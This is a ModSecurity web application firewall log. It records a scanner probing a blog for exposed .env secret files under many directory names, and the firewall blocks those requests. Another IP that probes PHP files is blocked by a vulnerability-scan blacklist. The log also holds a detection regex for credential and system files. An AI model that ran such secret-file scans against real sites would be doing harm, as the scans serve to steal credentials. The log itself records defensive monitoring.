[Tue May 26 14:01:50.398448 2026] [security2:error] [pid 578581:tid 578743] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadZm_8al1sb-umPtnygAAIAs"]
[Tue May 26 14:01:50.404221 2026] [security2:error] [pid 578581:tid 578743] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadZm_8al1sb-umPtnzQAAIAc"]
[Tue May 26 14:01:50.405055 2026] [security2:error] [pid 578581:tid 578743] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadZm_8al1sb-umPtnyAAAIHA"]
[Tue May 26 14:01:50.408119 2026] [security2:error] [pid 578581:tid 578743] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadZm_8al1sb-umPtnxwAAIAQ"]
[Tue May 26 14:01:50.442307 2026] [security2:error] [pid 578581:tid 578743] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadZm_8al1sb-umPtnzgAAIAI"]
[Tue May 26 14:01:50.445225 2026] [security2:error] [pid 578581:tid 578743] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadZm_8al1sb-umPtnyQAAIA4"]
[Tue May 26 14:01:50.450527 2026] [security2:error] [pid 578581:tid 578743] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadZm_8al1sb-umPtnzAAAIAY"]
[Tue May 26 14:01:50.472222 2026] [security2:error] [pid 578581:tid 578743] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadZm_8al1sb-umPtnywAAIA8"]
[Tue May 26 14:01:50.551502 2026] [security2:error] [pid 578581:tid 578582] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/apps/.env"] [unique_id "ahVadpm_8al1sb-umPtn7gAAEAA"]
[Tue May 26 14:01:50.551712 2026] [security2:error] [pid 578581:tid 578678] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/application/.env"] [unique_id "ahVadpm_8al1sb-umPtn7QAAEGA"]
[Tue May 26 14:01:51.110827 2026] [security2:error] [pid 578581:tid 578813] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVadpm_8al1sb-umPtn_AAAAGY"]
[Tue May 26 14:01:51.123472 2026] [security2:error] [pid 578581:tid 578719] [client 4.193.189.92:6452] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/ee.php"] [unique_id "ahVad5m_8al1sb-umPtoBAAAAAg"]
[Tue May 26 14:01:51.333059 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadpm_8al1sb-umPtn5QAAEGI"]
[Tue May 26 14:01:51.341710 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadpm_8al1sb-umPtn6QAAEAo"]
[Tue May 26 14:01:51.349071 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadpm_8al1sb-umPtn6AAAEAE"]
[Tue May 26 14:01:51.355343 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadpm_8al1sb-umPtn5wAAEAw"]
[Tue May 26 14:01:51.359511 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadpm_8al1sb-umPtn5gAAEGM"]
[Tue May 26 14:01:51.360160 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadpm_8al1sb-umPtn6gAAEAM"]
[Tue May 26 14:01:51.367398 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadpm_8al1sb-umPtn7AAAEGQ"]
[Tue May 26 14:01:51.391989 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadpm_8al1sb-umPtn8gAAEBQ"]
[Tue May 26 14:01:51.396450 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadpm_8al1sb-umPtn6wAAEAg"]
[Tue May 26 14:01:51.400760 2026] [security2:error] [pid 578581:tid 578699] [remote 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadpm_8al1sb-umPtn9QAAEHU"]
[Tue May 26 14:01:51.413025 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadpm_8al1sb-umPtn8wAAEBU"]
[Tue May 26 14:01:51.413991 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadpm_8al1sb-umPtn9wAAEHQ"]
[Tue May 26 14:01:51.423795 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadpm_8al1sb-umPtn9AAAEBA"]
[Tue May 26 14:01:51.424834 2026] [security2:error] [pid 578581:tid 578599] [remote 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadpm_8al1sb-umPtn-wAAEBE"]
[Tue May 26 14:01:51.433408 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadpm_8al1sb-umPtn-gAAEHk"]
[Tue May 26 14:01:51.473128 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadpm_8al1sb-umPtn9gAAEBs"]
[Tue May 26 14:01:51.834208 2026] [security2:error] [pid 578581:tid 578804] [client 4.193.189.92:3114] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/edit.php"] [unique_id "ahVad5m_8al1sb-umPtoJgAAAF0"]
[Tue May 26 14:01:52.332231 2026] [security2:error] [pid 578581:tid 578819] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVad5m_8al1sb-umPtoDQAAbH4"]
[Tue May 26 14:01:52.334006 2026] [security2:error] [pid 578581:tid 578819] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVad5m_8al1sb-umPtoDgAAbH0"]
[Tue May 26 14:01:52.342937 2026] [security2:error] [pid 578581:tid 578819] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVad5m_8al1sb-umPtoEQAAbBg"]
[Tue May 26 14:01:52.356125 2026] [security2:error] [pid 578581:tid 578819] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVad5m_8al1sb-umPtoEAAAbBw"]
[Tue May 26 14:01:52.359029 2026] [security2:error] [pid 578581:tid 578819] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVad5m_8al1sb-umPtoFAAAbAk"]
[Tue May 26 14:01:52.368723 2026] [security2:error] [pid 578581:tid 578819] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVad5m_8al1sb-umPtoEgAAbHE"]
[Tue May 26 14:01:52.381265 2026] [security2:error] [pid 578581:tid 578819] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVad5m_8al1sb-umPtoGAAAbBM"]
[Tue May 26 14:01:52.389902 2026] [security2:error] [pid 578581:tid 578819] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVad5m_8al1sb-umPtoFwAAbHY"]
[Tue May 26 14:01:52.393997 2026] [security2:error] [pid 578581:tid 578819] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVad5m_8al1sb-umPtoDwAAbH8"]
[Tue May 26 14:01:52.397859 2026] [security2:error] [pid 578581:tid 578819] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVad5m_8al1sb-umPtoGQAAbF4"]
[Tue May 26 14:01:52.401974 2026] [security2:error] [pid 578581:tid 578819] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVad5m_8al1sb-umPtoIAAAbBk"]
[Tue May 26 14:01:52.405284 2026] [security2:error] [pid 578581:tid 578819] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVad5m_8al1sb-umPtoHwAAbB0"]
[Tue May 26 14:01:52.407323 2026] [security2:error] [pid 578581:tid 578819] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVad5m_8al1sb-umPtoHQAAbCA"]
[Tue May 26 14:01:52.408564 2026] [security2:error] [pid 578581:tid 578819] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVad5m_8al1sb-umPtoIQAAbDY"]
[Tue May 26 14:01:52.439096 2026] [security2:error] [pid 578581:tid 578819] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVad5m_8al1sb-umPtoIgAAbB8"]
[Tue May 26 14:01:52.439581 2026] [security2:error] [pid 578581:tid 578819] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVad5m_8al1sb-umPtoHgAAbHw"]
[Tue May 26 14:01:52.503864 2026] [security2:error] [pid 578581:tid 578702] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/back-api/.env"] [unique_id "ahVaeJm_8al1sb-umPtoOgAAH3g"]
[Tue May 26 14:01:52.514688 2026] [security2:error] [pid 578581:tid 578617] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/back-end/.env"] [unique_id "ahVaeJm_8al1sb-umPtoOwAAHyM"]
[Tue May 26 14:01:52.527408 2026] [security2:error] [pid 578581:tid 578616] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/back/.env"] [unique_id "ahVaeJm_8al1sb-umPtoPAAAHyI"]
[Tue May 26 14:01:52.535890 2026] [security2:error] [pid 578581:tid 578618] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/backend-api/.env"] [unique_id "ahVaeJm_8al1sb-umPtoPQAAHyQ"]
[Tue May 26 14:01:52.539406 2026] [security2:error] [pid 578581:tid 578635] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/backend/.env"] [unique_id "ahVaeJm_8al1sb-umPtoPgAAHzU"]
[Tue May 26 14:01:52.557266 2026] [security2:error] [pid 578581:tid 578760] [client 4.193.189.92:6499] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/f35.php"] [unique_id "ahVaeJm_8al1sb-umPtoQwAAADE"]
[Tue May 26 14:01:52.603813 2026] [security2:error] [pid 578581:tid 578742] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaeJm_8al1sb-umPtoNgAAH3M"]
[Tue May 26 14:01:52.685550 2026] [security2:error] [pid 578581:tid 578621] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/backup/.env"] [unique_id "ahVaeJm_8al1sb-umPtoVAAAHyc"]
[Tue May 26 14:01:52.749829 2026] [security2:error] [pid 578581:tid 578653] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/be/.env"] [unique_id "ahVaeJm_8al1sb-umPtoVwAAH0c"]
[Tue May 26 14:01:52.831941 2026] [security2:error] [pid 578581:tid 578651] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/beta/.env"] [unique_id "ahVaeJm_8al1sb-umPtoWAAAH0U"]
[Tue May 26 14:01:53.284571 2026] [security2:error] [pid 578581:tid 578742] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaeJm_8al1sb-umPtoOAAAH3c"]
[Tue May 26 14:01:53.286913 2026] [security2:error] [pid 578581:tid 578742] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaeJm_8al1sb-umPtoNwAAH3o"]
[Tue May 26 14:01:53.304272 2026] [security2:error] [pid 578581:tid 578742] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaeJm_8al1sb-umPtoOQAAH3s"]
[Tue May 26 14:01:53.378405 2026] [security2:error] [pid 578581:tid 578742] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaeJm_8al1sb-umPtoPwAAHx4"]
[Tue May 26 14:01:53.407866 2026] [security2:error] [pid 578581:tid 578742] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaeJm_8al1sb-umPtoSwAAHzM"]
[Tue May 26 14:01:53.419534 2026] [security2:error] [pid 578581:tid 578742] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaeJm_8al1sb-umPtoTAAAHyg"]
[Tue May 26 14:01:53.430097 2026] [security2:error] [pid 578581:tid 578742] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaeJm_8al1sb-umPtoUgAAHzQ"]
